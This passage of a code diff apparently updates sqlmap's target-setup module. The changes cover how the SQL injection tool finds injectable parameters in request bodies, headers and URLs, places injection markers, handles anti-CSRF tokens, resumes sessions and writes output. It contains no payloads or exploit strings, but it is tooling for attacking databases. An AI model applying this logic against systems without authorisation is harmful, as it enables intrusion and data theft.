mergedOptions from lib.core.data import paths +from lib.core.datatype import InjectionDict from lib.core.dicts import DBMS_DICT from lib.core.dump import dumper from lib.core.enums import HASHDB_KEYS -from lib.core.enums import HTTPHEADER +from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import PLACE from lib.core.enums import POST_HINT from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.exception import SqlmapMissingPrivileges -from lib.core.exception import SqlmapSyntaxException +from lib.core.exception import SqlmapNoneDataException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUserQuitException +from lib.core.option import _setAuthCred from lib.core.option import _setDBMS from lib.core.option import _setKnowledgeBaseAttributes -from lib.core.option import _setAuthCred +from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX +from lib.core.settings import ASTERISK_MARKER +from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR +from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import HOST_ALIASES +from lib.core.settings import INJECT_HERE_REGEX +from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX from lib.core.settings import JSON_RECOGNITION_REGEX from lib.core.settings import MULTIPART_RECOGNITION_REGEX +from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS from lib.core.settings import REFERER_ALIASES +from lib.core.settings import RESTORE_MERGED_OPTIONS from lib.core.settings import RESULTS_FILE_FORMAT -from lib.core.settings import SOAP_RECOGNITION_REGEX +from lib.core.settings import SESSION_SQLITE_FILE from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import UNENCODED_ORIGINAL_VALUE from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.core.settings import URI_INJECTABLE_REGEX from lib.core.settings import USER_AGENT_ALIASES +from lib.core.settings import XML_RECOGNITION_REGEX +from lib.core.threads import getCurrentThreadData from lib.utils.hashdb import HashDB -from lib.core.xmldump import dumper as xmldumper -from thirdparty.odict.odict import OrderedDict +from thirdparty import six +from thirdparty.odict import OrderedDict +from thirdparty.six.moves import urllib as _urllib def _setRequestParams(): """ @@ -66,6 +92,7 @@ def _setRequestParams(): conf.parameters[None] = "direct connection" return + hintNames = [] testableParameters = False # Perform checks on GET parameters @@ -79,90 +106,193 @@ def _setRequestParams(): # Perform checks on POST parameters if conf.method == HTTPMETHOD.POST and conf.data is None: - errMsg = "HTTP POST method depends on HTTP data value to be posted" - raise SqlmapSyntaxException(errMsg) + logger.warning("detected empty POST body") + conf.data = "" if conf.data is not None: - conf.method = HTTPMETHOD.POST + conf.method = conf.method or HTTPMETHOD.POST + + def process(match, repl): + retVal = match.group(0) + + if not (conf.testParameter and match.group("name") not in (removePostHintPrefix(_) for _ in conf.testParameter)) and match.group("name") == match.group("name").strip('\\'): + retVal = repl + while True: + _ = re.search(r"\\g<([^>]+)>", retVal) + if _: + try: + retVal = retVal.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else 
_.group(1))) + except IndexError: + break + else: + break + if kb.customInjectionMark in retVal: + hintNames.append((retVal.split(kb.customInjectionMark)[0], match.group("name").strip('"\'') if kb.postHint == POST_HINT.JSON_LIKE else match.group("name"))) + + return retVal + + if kb.processUserMarks is None and kb.customInjectionMark in conf.data: + message = "custom injection marker ('%s') found in %s " % (kb.customInjectionMark, conf.method) + message += "body. Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + else: + kb.processUserMarks = choice == 'Y' - if CUSTOM_INJECTION_MARK_CHAR in conf.data: # later processed - pass + if kb.processUserMarks: + kb.testOnlyCustom = True - elif re.search(JSON_RECOGNITION_REGEX, conf.data): - message = "JSON like data found in POST data. " + if re.search(JSON_RECOGNITION_REGEX, conf.data): + message = "JSON data found in %s body. " % conf.method message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + choice = readInput(message, default='Y').upper() + + if choice == 'Q': raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = re.sub(r'("[^"]+"\s*:\s*"[^"]+)"', r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, conf.data) - conf.data = re.sub(r'("[^"]+"\s*:\s*)(-?\d[\d\.]*\b)', r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, conf.data) + elif choice == 'Y': kb.postHint = POST_HINT.JSON + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*".*?)"(?%s"' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*")"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)(-?\d[\d\.]*)\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'("(?P[^"]+)"\s*:\s*)((true|false|null))\b', functools.partial(process, repl=r'\g<1>\g<3>%s' % kb.customInjectionMark), conf.data) + for match in re.finditer(r'(?P[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data): + if not (conf.testParameter and match.group("name") not in conf.testParameter): + _ = match.group(2) + if kb.customInjectionMark not in _: # Note: only for unprocessed (simple) forms - i.e. non-associative arrays (e.g. [1,2,3]) + _ = re.sub(r'("[^"]+)"', r'\g<1>%s"' % kb.customInjectionMark, _) + _ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', r'\g<0>%s' % kb.customInjectionMark, _) + conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _)) + + elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data): + message = "JSON-like data found in %s body. " % conf.method + message += "Do you want to process it? 
[Y/n/q] " + choice = readInput(message, default='Y').upper() + + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + kb.postHint = POST_HINT.JSON_LIKE + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + if '"' in conf.data: + conf.data = re.sub(r'((?P"[^"]+"|\w+)\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % kb.customInjectionMark), conf.data) + conf.data = re.sub(r'((?P"[^"]+"|\w+)\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % kb.customInjectionMark), conf.data) + else: + conf.data = re.sub(r"((?P'[^']+'|\w+)\s*:\s*'[^']+)'", functools.partial(process, repl=r"\g<1>%s'" % kb.customInjectionMark), conf.data) + conf.data = re.sub(r"((?P'[^']+'|\w+)\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % kb.customInjectionMark), conf.data) + + elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data): + message = "Array-like data found in %s body. " % conf.method + message += "Do you want to process it? [Y/n/q] " + choice = readInput(message, default='Y').upper() - elif re.search(SOAP_RECOGNITION_REGEX, conf.data): - message = "SOAP/XML like data found in POST data. " + if choice == 'Q': + raise SqlmapUserQuitException + elif choice == 'Y': + kb.postHint = POST_HINT.ARRAY_LIKE + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % kb.customInjectionMark, conf.data) + + elif re.search(XML_RECOGNITION_REGEX, conf.data): + message = "SOAP/XML data found in %s body. " % conf.method message += "Do you want to process it? [Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + choice = readInput(message, default='Y').upper() + + if choice == 'Q': raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = re.sub(r"(<([^>]+)( [^<]*)?>)([^<]+)(\g<4>%s\g<5>" % CUSTOM_INJECTION_MARK_CHAR, conf.data) + elif choice == 'Y': kb.postHint = POST_HINT.SOAP if "soap" in conf.data.lower() else POST_HINT.XML + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r"(<(?P[^>]+)( [^<]*)?>)([^<]+)(\g<4>%s\g<5>" % kb.customInjectionMark), conf.data) elif re.search(MULTIPART_RECOGNITION_REGEX, conf.data): - message = "Multipart like data found in POST data. " + message = "Multipart-like data found in %s body. " % conf.method message += "Do you want to process it? 
[Y/n/q] " - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + choice = readInput(message, default='Y').upper() + + if choice == 'Q': raise SqlmapUserQuitException - elif test[0] not in ("n", "N"): - conf.data = re.sub(r"(?si)(Content-Disposition.+?)((\r)?\n--)", r"\g<1>%s\g<2>" % CUSTOM_INJECTION_MARK_CHAR, conf.data) + elif choice == 'Y': kb.postHint = POST_HINT.MULTIPART + if not (kb.processUserMarks and kb.customInjectionMark in conf.data): + conf.data = getattr(conf.data, UNENCODED_ORIGINAL_VALUE, conf.data) + conf.data = conf.data.replace(kb.customInjectionMark, ASTERISK_MARKER) + conf.data = re.sub(r"(?si)(Content-Disposition:[^\n]+\s+name=\"(?P[^\"]+)\"(?:[^f|^b]|f(?!ilename=)|b(?!oundary=))*?)((%s)--)" % ("\r\n" if "\r\n" in conf.data else '\n'), + functools.partial(process, repl=r"\g<1>%s\g<3>" % kb.customInjectionMark), conf.data) + + if not kb.postHint: + if kb.customInjectionMark in conf.data: # later processed + pass + else: + place = PLACE.POST - else: - place = PLACE.POST - - conf.parameters[place] = conf.data - paramDict = paramToDict(place, conf.data) + conf.parameters[place] = conf.data + paramDict = paramToDict(place, conf.data) - if paramDict: - conf.paramDict[place] = paramDict - testableParameters = True + if paramDict: + conf.paramDict[place] = paramDict + testableParameters = True + else: + if kb.customInjectionMark not in conf.data: # in case that no usable parameter values has been found + conf.parameters[PLACE.POST] = conf.data - kb.processUserMarks = True if kb.postHint else kb.processUserMarks + kb.processUserMarks = True if (kb.postHint and kb.customInjectionMark in (conf.data or "")) else kb.processUserMarks - if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)): - warnMsg = "you've provided target url without any GET " - warnMsg += "parameters (e.g. www.site.com/article.php?id=1) " + if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and kb.customInjectionMark not in (conf.data or "") and conf.url.startswith("http"): + warnMsg = "you've provided target URL without any GET " + warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') " warnMsg += "and without providing any POST parameters " - warnMsg += "through --data option" - logger.warn(warnMsg) + warnMsg += "through option '--data'" + logger.warning(warnMsg) message = "do you want to try URI injections " - message += "in the target url itself? [Y/n/q] " - test = readInput(message, default="Y") + message += "in the target URL itself? 
[Y/n/q] " + choice = readInput(message, default='Y').upper() - if not test or test[0] not in ("n", "N"): - conf.url = "%s%s" % (conf.url, CUSTOM_INJECTION_MARK_CHAR) - kb.processUserMarks = True - elif test[0] in ("q", "Q"): + if choice == 'Q': raise SqlmapUserQuitException + elif choice == 'Y': + conf.url = "%s%s" % (conf.url, kb.customInjectionMark) + kb.processUserMarks = True - for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, re.sub(r"\bq=[^;']+", "", str(conf.httpHeaders)))): - if CUSTOM_INJECTION_MARK_CHAR in (value or ""): + for place, value in ((PLACE.URI, conf.url), (PLACE.CUSTOM_POST, conf.data), (PLACE.CUSTOM_HEADER, str(conf.httpHeaders))): + if place == PLACE.CUSTOM_HEADER and any((conf.forms, conf.crawlDepth)): + continue + + _ = re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or "") if place == PLACE.CUSTOM_HEADER else value or "" + if kb.customInjectionMark in _: if kb.processUserMarks is None: - _ = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer'} - message = "custom injection marking character ('%s') found in option " % CUSTOM_INJECTION_MARK_CHAR - message += "'%s'. Do you want to process it? [Y/n/q] " % _[place] - test = readInput(message, default="Y") - if test and test[0] in ("q", "Q"): + lut = {PLACE.URI: '-u', PLACE.CUSTOM_POST: '--data', PLACE.CUSTOM_HEADER: '--headers/--user-agent/--referer/--cookie'} + message = "custom injection marker ('%s') found in option " % kb.customInjectionMark + message += "'%s'. Do you want to process it? [Y/n/q] " % lut[place] + choice = readInput(message, default='Y').upper() + + if choice == 'Q': raise SqlmapUserQuitException else: - kb.processUserMarks = not test or test[0] not in ("n", "N") + kb.processUserMarks = choice == 'Y' + + if kb.processUserMarks: + kb.testOnlyCustom = True + + if "=%s" % kb.customInjectionMark in _: + warnMsg = "it seems that you've provided empty parameter value(s) " + warnMsg += "for testing. 
Please, always use only valid parameter values " + warnMsg += "so sqlmap could be able to run properly" + logger.warning(warnMsg) if not kb.processUserMarks: if place == PLACE.URI: - query = urlparse.urlsplit(value).query + query = _urllib.parse.urlsplit(value).query if query: parameters = conf.parameters[PLACE.GET] = query paramDict = paramToDict(PLACE.GET, parameters) @@ -180,20 +310,33 @@ def _setRequestParams(): testableParameters = True else: + if place == PLACE.URI: + value = conf.url = conf.url.replace('+', "%20") # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5123 + conf.parameters[place] = value conf.paramDict[place] = OrderedDict() if place == PLACE.CUSTOM_HEADER: for index in xrange(len(conf.httpHeaders)): header, value = conf.httpHeaders[index] - if CUSTOM_INJECTION_MARK_CHAR in re.sub(r"\bq=[^;']+", "", value): - conf.paramDict[place][header] = "%s,%s" % (header, value) - conf.httpHeaders[index] = (header, value.replace(CUSTOM_INJECTION_MARK_CHAR, "")) + if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value): + parts = value.split(kb.customInjectionMark) + for i in xrange(len(parts) - 1): + conf.paramDict[place]["%s #%d%s" % (header, i + 1, kb.customInjectionMark)] = "%s,%s" % (header, "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts)))) + conf.httpHeaders[index] = (header, value.replace(kb.customInjectionMark, "")) else: - parts = value.split(CUSTOM_INJECTION_MARK_CHAR) + parts = value.split(kb.customInjectionMark) for i in xrange(len(parts) - 1): - conf.paramDict[place]["%s#%d%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, CUSTOM_INJECTION_MARK_CHAR)] = "".join("%s%s" % (parts[j], CUSTOM_INJECTION_MARK_CHAR if i == j else "") for j in xrange(len(parts))) + name = None + if kb.postHint: + for ending, _ in hintNames: + if parts[i].endswith(ending): + name = "%s %s" % (kb.postHint, _) + break + if name is None: + name = "%s#%s%s" % (("%s " % kb.postHint) if kb.postHint else "", i + 1, kb.customInjectionMark) + conf.paramDict[place][name] = "".join("%s%s" % (parts[j], kb.customInjectionMark if i == j else "") for j in xrange(len(parts))) if place == PLACE.URI and PLACE.GET in conf.paramDict: del conf.paramDict[PLACE.GET] @@ -203,8 +346,9 @@ def _setRequestParams(): testableParameters = True if kb.processUserMarks: - conf.url = conf.url.replace(CUSTOM_INJECTION_MARK_CHAR, "") - conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, "") if conf.data else conf.data + for item in ("url", "data", "agent", "referer", "cookie"): + if conf.get(item): + conf[item] = conf[item].replace(kb.customInjectionMark, "") # Perform checks on Cookie parameters if conf.cookie: @@ -217,39 +361,46 @@ def _setRequestParams(): # Perform checks on header values if conf.httpHeaders: - for httpHeader, headerValue in conf.httpHeaders: + for httpHeader, headerValue in list(conf.httpHeaders): # Url encoding of the header values should be avoided # Reference: http://stackoverflow.com/questions/5085904/is-ok-to-urlencode-the-value-in-headerlocation-value - httpHeader = httpHeader.title() - - if httpHeader == HTTPHEADER.USER_AGENT: + if httpHeader.upper() == HTTP_HEADER.USER_AGENT.upper(): conf.parameters[PLACE.USER_AGENT] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, USER_AGENT_ALIASES, True))) if condition: conf.paramDict[PLACE.USER_AGENT] = {PLACE.USER_AGENT: 
headerValue} testableParameters = True - elif httpHeader == HTTPHEADER.REFERER: + elif httpHeader.upper() == HTTP_HEADER.REFERER.upper(): conf.parameters[PLACE.REFERER] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, REFERER_ALIASES, True))) if condition: conf.paramDict[PLACE.REFERER] = {PLACE.REFERER: headerValue} testableParameters = True - elif httpHeader == HTTPHEADER.HOST: + elif httpHeader.upper() == HTTP_HEADER.HOST.upper(): conf.parameters[PLACE.HOST] = urldecode(headerValue) - condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES))) + condition = any((not conf.testParameter, intersect(conf.testParameter, HOST_ALIASES, True))) if condition: conf.paramDict[PLACE.HOST] = {PLACE.HOST: headerValue} testableParameters = True + else: + condition = intersect(conf.testParameter, [httpHeader], True) + + if condition: + conf.parameters[PLACE.CUSTOM_HEADER] = str(conf.httpHeaders) + conf.paramDict[PLACE.CUSTOM_HEADER] = {httpHeader: "%s,%s%s" % (httpHeader, headerValue, kb.customInjectionMark)} + conf.httpHeaders = [(_[0], _[1].replace(kb.customInjectionMark, "")) for _ in conf.httpHeaders] + testableParameters = True + if not conf.parameters: errMsg = "you did not provide any GET, POST and Cookie " errMsg += "parameter, neither an User-Agent, Referer or Host header value" @@ -257,24 +408,49 @@ def _setRequestParams(): elif not testableParameters: errMsg = "all testable parameters you provided are not present " - errMsg += "within the GET, POST and Cookie parameters" + errMsg += "within the given request data" raise SqlmapGenericException(errMsg) + if conf.csrfToken: + if not any(re.search(conf.csrfToken, ' '.join(_), re.I) for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}), conf.paramDict.get(PLACE.COOKIE, {}))) and not re.search(r"\b%s\b" % conf.csrfToken, conf.data or "") and conf.csrfToken not in set(_[0].lower() for _ in conf.httpHeaders) and conf.csrfToken not in conf.paramDict.get(PLACE.COOKIE, {}) and not all(re.search(conf.csrfToken, _, re.I) for _ in conf.paramDict.get(PLACE.URI, {}).values()): + errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken._original + errMsg += "found in provided GET, POST, Cookie or header values" + raise SqlmapGenericException(errMsg) + else: + for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE): + if conf.csrfToken: + break + + for parameter in conf.paramDict.get(place, {}): + if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES): + message = "%sparameter '%s' appears to hold anti-CSRF token. " % ("%s " % place if place != parameter else "", parameter) + message += "Do you want sqlmap to automatically update it in further requests? [y/N] " + + if readInput(message, default='N', boolean=True): + class _(six.text_type): + pass + conf.csrfToken = _(re.escape(getUnicode(parameter))) + conf.csrfToken._original = getUnicode(parameter) + break + def _setHashDB(): """ Check and set the HashDB SQLite file for query resume functionality. 
""" if not conf.hashDBFile: - conf.hashDBFile = conf.sessionFile or "%s%ssession.sqlite" % (conf.outputPath, os.sep) + conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, SESSION_SQLITE_FILE) + + if conf.flushSession: + if os.path.exists(conf.hashDBFile): + if conf.hashDB: + conf.hashDB.closeAll() - if os.path.exists(conf.hashDBFile): - if conf.flushSession: try: os.remove(conf.hashDBFile) logger.info("flushing session file") - except OSError, msg: - errMsg = "unable to flush the session file (%s)" % msg + except OSError as ex: + errMsg = "unable to flush the session file ('%s')" % getSafeExString(ex) raise SqlmapFilePathException(errMsg) conf.hashDB = HashDB(conf.hashDBFile) @@ -285,24 +461,28 @@ def _resumeHashDBValues(): """ kb.absFilePaths = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or kb.absFilePaths - kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars - kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings kb.brute.tables = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_TABLES, True) or kb.brute.tables kb.brute.columns = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_COLUMNS, True) or kb.brute.columns + kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars + kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable + kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH) + if isNumPosStrValue(kb.errorChunkLength): + kb.errorChunkLength = int(kb.errorChunkLength) + else: + kb.errorChunkLength = None + conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH) for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []: - if injection.place in conf.paramDict and \ - injection.parameter in conf.paramDict[injection.place]: - - if not conf.tech or intersect(conf.tech, injection.data.keys()): - if intersect(conf.tech, injection.data.keys()): - injection.data = dict(filter(lambda (key, item): key in conf.tech, injection.data.items())) - + if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and injection.parameter in conf.paramDict[injection.place]: + if not conf.technique or intersect(conf.technique, injection.data.keys()): + if intersect(conf.technique, injection.data.keys()): + injection.data = dict(_ for _ in injection.data.items() if _[0] in conf.technique) if injection not in kb.injections: kb.injections.append(injection) + kb.vulnHosts.add(conf.hostname) _resumeDBMS() _resumeOS() @@ -315,12 +495,18 @@ def _resumeDBMS(): value = hashDBRetrieve(HASHDB_KEYS.DBMS) if not value: - return + if conf.offline: + errMsg = "unable to continue in offline mode " + errMsg += "because of lack of usable " + errMsg += "session data" + raise SqlmapNoneDataException(errMsg) + else: + return dbms = value.lower() dbmsVersion = [UNKNOWN_DBMS_VERSION] - _ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS])) - _ = re.search("%s ([\d\.]+)" % _, dbms, re.I) + _ = "(%s)" % ('|'.join(SUPPORTED_DBMS)) + _ = re.search(r"\A%s (.*)" % _, dbms, re.I) if _: dbms = _.group(1).lower() @@ -328,7 +514,7 @@ def _resumeDBMS(): if conf.dbms: check = True - for aliases, _, _ in DBMS_DICT.values(): + for aliases, _, _, _ in DBMS_DICT.values(): if conf.dbms.lower() in aliases and dbms not in aliases: check = False break @@ -339,9 +525,8 @@ def _resumeDBMS(): message += "sqlmap assumes the back-end DBMS is '%s'. 
" % dbms message += "Do you really want to force the back-end " message += "DBMS value? [y/N] " - test = readInput(message, default="N") - if not test or test[0] in ("n", "N"): + if not readInput(message, default='N', boolean=True): conf.dbms = None Backend.setDbms(dbms) Backend.setVersionList(dbmsVersion) @@ -375,9 +560,8 @@ def _resumeOS(): message += "operating system is %s. " % os message += "Do you really want to force the back-end DBMS " message += "OS value? [y/N] " - test = readInput(message, default="N") - if not test or test[0] in ("n", "N"): + if not readInput(message, default='N', boolean=True): conf.os = os else: conf.os = os @@ -394,24 +578,52 @@ def _setResultsFile(): return if not conf.resultsFP: - conf.resultsFilename = "%s%s%s" % (paths.SQLMAP_OUTPUT_PATH, os.sep, time.strftime(RESULTS_FILE_FORMAT).lower()) - conf.resultsFP = codecs.open(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0) - conf.resultsFP.writelines("Target url,Place,Parameter,Techniques%s" % os.linesep) + conf.resultsFile = conf.resultsFile or os.path.join(paths.SQLMAP_OUTPUT_PATH, time.strftime(RESULTS_FILE_FORMAT).lower()) + found = os.path.exists(conf.resultsFile) - logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename) + try: + conf.resultsFP = openFile(conf.resultsFile, "a", UNICODE_ENCODING, buffering=0) + except (OSError, IOError) as ex: + try: + warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFile, getUnicode(ex)) + handle, conf.resultsFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv") + os.close(handle) + conf.resultsFP = openFile(conf.resultsFile, "w+", UNICODE_ENCODING, buffering=0) + warnMsg += "Using temporary file '%s' instead" % conf.resultsFile + logger.warning(warnMsg) + except IOError as _: + errMsg = "unable to write to the temporary directory ('%s'). " % _ + errMsg += "Please make sure that your disk is not full and " + errMsg += "that you have sufficient write permissions to " + errMsg += "create temporary files and/or directories" + raise SqlmapSystemException(errMsg) + + if not found: + conf.resultsFP.writelines("Target URL,Place,Parameter,Technique(s),Note(s)%s" % os.linesep) + + logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFile) def _createFilesDir(): """ Create the file directory. """ - if not conf.rFile: + if not any((conf.fileRead, conf.commonFiles)): return conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname if not os.path.isdir(conf.filePath): - os.makedirs(conf.filePath, 0755) + try: + os.makedirs(conf.filePath) + except OSError as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapfiles") + warnMsg = "unable to create files directory " + warnMsg += "'%s' (%s). " % (conf.filePath, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) + + conf.filePath = tempDir def _createDumpDir(): """ @@ -421,17 +633,22 @@ def _createDumpDir(): if not conf.dumpTable and not conf.dumpAll and not conf.search: return - conf.dumpPath = paths.SQLMAP_DUMP_PATH % conf.hostname + conf.dumpPath = safeStringFormat(paths.SQLMAP_DUMP_PATH, conf.hostname) if not os.path.isdir(conf.dumpPath): - os.makedirs(conf.dumpPath, 0755) + try: + os.makedirs(conf.dumpPath) + except Exception as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapdump") + warnMsg = "unable to create dump directory " + warnMsg += "'%s' (%s). 
" % (conf.dumpPath, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) -def _configureDumper(): - if hasattr(conf, 'xmlFile') and conf.xmlFile: - conf.dumper = xmldumper - else: - conf.dumper = dumper + conf.dumpPath = tempDir +def _configureDumper(): + conf.dumper = dumper conf.dumper.setOutputFile() def _createTargetDirs(): @@ -439,59 +656,60 @@ def _createTargetDirs(): Create the output directory. """ - if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH): - try: - os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755) - except OSError, ex: - tempDir = tempfile.mkdtemp(prefix='output') - warnMsg = "unable to create default root output directory " - warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, ex) - warnMsg += "using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) - - paths.SQLMAP_OUTPUT_PATH = tempDir + conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname))) - conf.outputPath = "%s%s%s" % (paths.SQLMAP_OUTPUT_PATH, os.sep, conf.hostname) + try: + if not os.path.isdir(conf.outputPath): + os.makedirs(conf.outputPath) + except (OSError, IOError, TypeError) as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") + warnMsg = "unable to create output directory " + warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) - if not os.path.isdir(conf.outputPath): - try: - os.makedirs(conf.outputPath, 0755) - except OSError, ex: - tempDir = tempfile.mkdtemp(prefix='output') - warnMsg = "unable to create output directory " - warnMsg += "'%s' (%s). " % (conf.outputPath, ex) - warnMsg += "using temporary directory '%s' instead" % tempDir - logger.warn(warnMsg) + conf.outputPath = tempDir - conf.outputPath = tempDir + conf.outputPath = getUnicode(conf.outputPath) try: - with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f: - f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname) + with openFile(os.path.join(conf.outputPath, "target.txt"), "w+") as f: + f.write(getUnicode(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)) f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET)) + f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding)) if conf.data: - f.write("\n\n%s" % conf.data) - except IOError, ex: - if "denied" in str(ex): + f.write("\n\n%s" % getUnicode(conf.data)) + except IOError as ex: + if "denied" in getUnicode(ex): errMsg = "you don't have enough permissions " else: errMsg = "something went wrong while trying " - errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, ex) + errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, getSafeExString(ex)) raise SqlmapMissingPrivileges(errMsg) + except UnicodeError as ex: + warnMsg = "something went wrong while saving target data ('%s')" % getSafeExString(ex) + logger.warning(warnMsg) _createDumpDir() _createFilesDir() _configureDumper() -def _restoreCmdLineOptions(): +def _setAuxOptions(): + """ + Setup auxiliary (host-dependent) options + """ + + 